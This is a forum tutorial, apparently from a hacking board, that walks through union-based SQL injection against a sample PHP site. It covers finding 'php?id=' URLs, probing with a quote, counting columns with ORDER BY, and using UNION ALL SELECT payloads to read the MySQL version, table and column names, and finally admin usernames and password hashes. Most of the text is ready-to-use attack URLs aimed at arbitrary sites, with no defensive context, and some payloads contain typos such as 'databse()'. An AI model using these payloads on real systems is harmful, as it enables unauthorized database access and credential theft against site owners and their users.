SQL Injection Tutorial - SQLI Thread
Hi , i am writing this tutorial in a very easy language. Still have any problem? Scrap me or leave a comment here.
SQL injection is a code that exploits a vulnerability in the database of a website.
Step 1
Firstly we will find a site which is vulnerable to SQLI .
So surf the site till u get to a URL which looks like this -:
www . prateek . com/articles/index.php?id=213
By this i mean a url ending with something like this "php?id=213"
Now to check weder the site is vulnerable or not , we add a ' sign at the end of the URL.
Example = > www . prateek . com/articles/index.php?id=213'
If we get an error like this "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1"
or similar it means the site is vulnerable to SQLI.
Step 2
Finding the number of columns , now we will find the number of columns with the ORDER BY command.
Example = >www . prateek . com/articles/index.php?id=213 order by 10--
So here we added the number 10 assuming that there are 10 colomns.
If the site does not have 10 columns it will give an error "Unknown column '10' in 'order clause'"
Ok this means that the number of coloms is less than 10 .So we continue to test by decreasing the number.
Example ==> www . prateek . com/articles/index.php?id=213 order by 9--
www . prateek . com/articles/index.php?id=213 order by 8--
www . prateek . com/articles/index.php?id=213 order by 7--
www . prateek . com/articles/index.php?id=213 order by 6--
www . prateek . com/articles/index.php?id=213 order by 5--
Now when we test it for 5 columns it does not give an error and if we test it for 6 it gives an error which means that the number of columns is 5.
step 3 :
So now as we know that there are 5 coiumns we will now use the UNION ALL command.
EXAMPLE = >
www . prateek . com/articles/index.php?id=213 union all select 1,2,3,4,5--
As there were 5 columns we selected all the 5 columns.
When we execute this URL then on the page there will be number(s) displayed.
Like 2 or 3 or 4 etc.(This will not be greater than the number of columns)
Step 4
Now the number which appeared we have to remember it as we will use it in the next step.
Let us assume that number 3 appeared.
So now we will check the version of MYSQL with the help of this number
Example - www . prateek . com/articles/index.php?id=213 union all select 1,2,@@version,4,5--
We used the @@version command to find out the version bieng used.
We replaced the number 3 (as we had got it in the last step) with @@version
Now after executing this the version number will be displayed.
Step 5
like = > 5.0.51a-community
Now as the version is above 5 its fine.
Now we will find the names of columns and tables.
This will be done by -:
Example URL => www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=databse()--
After executing this , names of tables will be displayed.
It maybe anything .
Not them down. (choose names having admin , username , user etc in them)
Now we will find the names of columns
Example URL = > www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema=databse()--
After executing this , names of columns will be displayed.
It maybe anything .
Not them down. (choose names having password, username , pass etc in them)
you might think what happens when you don't see a column like username or password?
then you have to do a little guessing.
Step 6
Now we will move further.
And place the names of columns and tables we noted down in the URL
Example = > www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(username,0x3a,password) ,4,5 from admin--
In the above URL username is the column named username or user or admin etc. Similarly password is also a column. and the end part ie from admin (means the TABLE).
Thats it execute the URL and you will get the password in HASH (most probably , but if you are lucky you can even get it normally.)
Thanks for reading my tutorial hope you liked it.